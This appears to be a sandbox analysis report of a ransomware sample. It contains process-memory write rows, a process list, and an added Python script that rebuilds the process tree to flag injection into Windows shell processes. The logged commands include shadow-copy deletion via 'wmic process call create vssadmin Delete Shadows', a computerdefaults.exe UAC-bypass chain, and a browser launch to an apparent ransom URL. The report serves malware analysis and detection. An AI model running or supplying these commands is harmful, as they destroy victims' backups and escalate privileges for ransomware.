PID 2648 wrote to memory of 2512 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 2512 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 3084 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\wbem\wmic.exe
PID 2648 wrote to memory of 3084 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\wbem\wmic.exe
PID 2648 wrote to memory of 1368 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 1368 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 4736 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 4736 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\cmd.exe
PID 4736 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 4736 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1368 wrote to memory of 3180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1368 wrote to memory of 3180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 5052 wrote to memory of 4456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 5052 wrote to memory of 4456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 5084 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 5084 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2512 wrote to memory of 4268 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2512 wrote to memory of 4268 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 4512 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 4512 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4764 wrote to memory of 4016 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\wbem\wmic.exe
PID 4764 wrote to memory of 4016 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\wbem\wmic.exe
PID 4764 wrote to memory of 4016 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\wbem\wmic.exe
PID 4764 wrote to memory of 2516 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\cmd.exe
PID 4764 wrote to memory of 2516 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\cmd.exe
PID 4764 wrote to memory of 2516 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\cmd.exe
PID 4764 wrote to memory of 1164 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\cmd.exe
PID 4764 wrote to memory of 1164 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\cmd.exe
PID 4764 wrote to memory of 1164 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\cmd.exe
PID 1552 wrote to memory of 840 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wbem\wmic.exe
PID 1552 wrote to memory of 840 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wbem\wmic.exe
PID 4456 wrote to memory of 1632 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wbem\wmic.exe
PID 4456 wrote to memory of 1632 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wbem\wmic.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
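
The WriteProcessMemory rows above are the closest thing this report has to a process tree, and two facts are easy to miss when reading them by hand: the sample's code is executing inside Windows shell processes (sihost.exe and TextInputHost.exe are the roots that spawn cmd, wmic and notepad) rather than inside the rundll32.exe that loaded the DLL, and every ComputerDefaults.exe that writes to a child is the hijacked ms-settings handler firing. The Python below is an added example, not part of the sandbox output; it rebuilds parent/child edges from a de-duplicated subset of the rows above (copied in the sandbox's own row format) and flags both patterns. The set of "shell host" image names is this example's assumption. One caveat the output makes visible: the cmd /c computerdefaults.exe instances (PIDs 5052 and 5084) were launched through wmic process call create, i.e. by the WMI provider host rather than by a parent that wrote into them, so they have no incoming edge here and appear as roots.

```python
import re
from collections import defaultdict

# Constructed sample input: a de-duplicated subset of the rows from the
# "Suspicious use of WriteProcessMemory" table, in the sandbox's row format.
SAMPLE_ROWS = r"""
PID 2648 wrote to memory of 2880 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\notepad.exe
PID 2648 wrote to memory of 2512 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 3084 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\wbem\wmic.exe
PID 2648 wrote to memory of 1368 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\cmd.exe
PID 2648 wrote to memory of 4736 N/A C:\Windows\system32\sihost.exe C:\Windows\system32\cmd.exe
PID 4736 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1368 wrote to memory of 3180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 5052 wrote to memory of 4456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 5084 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2512 wrote to memory of 4268 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 4512 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4764 wrote to memory of 4016 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\wbem\wmic.exe
PID 4764 wrote to memory of 2516 N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe C:\Windows\system32\cmd.exe
PID 1552 wrote to memory of 840 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wbem\wmic.exe
PID 4456 wrote to memory of 1632 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wbem\wmic.exe
"""

# Row shape: "PID <p> wrote to memory of <c> N/A <parent image> <child image>".
# Image paths may contain spaces, but only end in .exe, so the lazy first group stops at the right place.
ROW = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+?\.exe) (.+\.exe)$", re.I)

# Windows shell/session processes that do not legitimately spawn cmd, wmic or notepad
# (this list is the example's own assumption). A chain rooted in one of them is hosting injected code.
SHELL_HOSTS = {"sihost.exe", "taskhostw.exe", "explorer.exe", "runtimebroker.exe",
               "textinputhost.exe", "svchost.exe", "dllhost.exe",
               "startmenuexperiencehost.exe", "searchapp.exe"}


def name(path):
    return path.rsplit("\\", 1)[-1]


def parse_rows(text):
    """Return {(parent_pid, child_pid): (parent_image, child_image)}; repeated rows collapse."""
    edges = {}
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if m:
            edges[(int(m[1]), int(m[2]))] = (m[3], m[4])
    return edges


def build_tree(edges):
    children, image = defaultdict(list), {}
    for (ppid, cpid), (pimg, cimg) in edges.items():
        children[ppid].append(cpid)
        image[ppid], image[cpid] = pimg, cimg
    return children, image


def analyze(text):
    edges = parse_rows(text)
    children, image = build_tree(edges)
    child_pids = {c for _, c in edges}
    roots = sorted(p for p in children if p not in child_pids)
    return {
        "roots": roots,
        # roots that are shell components: the processes the sample injected into
        "injection_hosts": [p for p in roots if name(image[p]).lower() in SHELL_HOSTS],
        # ComputerDefaults.exe writing to a child: the hijacked ms-settings handler running
        "uac_bypass": sorted((p, c) for (p, c), (pimg, _) in edges.items()
                             if name(pimg).lower() == "computerdefaults.exe"),
    }


def render_chains(text):
    """Flatten the tree into 'image(pid) -> image(pid) -> ...' strings, one per leaf."""
    children, image = build_tree(parse_rows(text))
    out = []

    def walk(pid, path):
        path = path + [f"{name(image[pid])}({pid})"]
        if not children.get(pid):
            out.append(" -> ".join(path))
        for c in sorted(children.get(pid, [])):
            walk(c, path)

    for root in analyze(text)["roots"]:
        walk(root, [])
    return out


if __name__ == "__main__":
    for chain in render_chains(SAMPLE_ROWS):
        print(chain)
    print(analyze(SAMPLE_ROWS))
```

Feed it the full table rather than the subset and the Edge rows fold into one chain under cmd.exe(2512); Chromium's sandbox broker writing into its own child processes is why msedge.exe dominates this table without being part of the malicious activity.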

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\cb0261d9a3e77ffecdb51914b3690f18_JaffaCakes118.dll,#1

C:\Windows\system32\notepad.exe

notepad.exe C:\Users\Public\readme.txt

C:\Windows\system32\cmd.exe

cmd /c "start http://78800e98f0cc24503uahnpdvb.iecard.top/uahnpdvb^&2^&42229745^&62^&319^&2219041"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://78800e98f0cc24503uahnpdvb.iecard.top/uahnpdvb&2&42229745&62&319&2219041

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0xf8,0x130,0x7ffd63e246f8,0x7ffd63e24708,0x7ffd63e24718

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1972 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3536 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3536 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

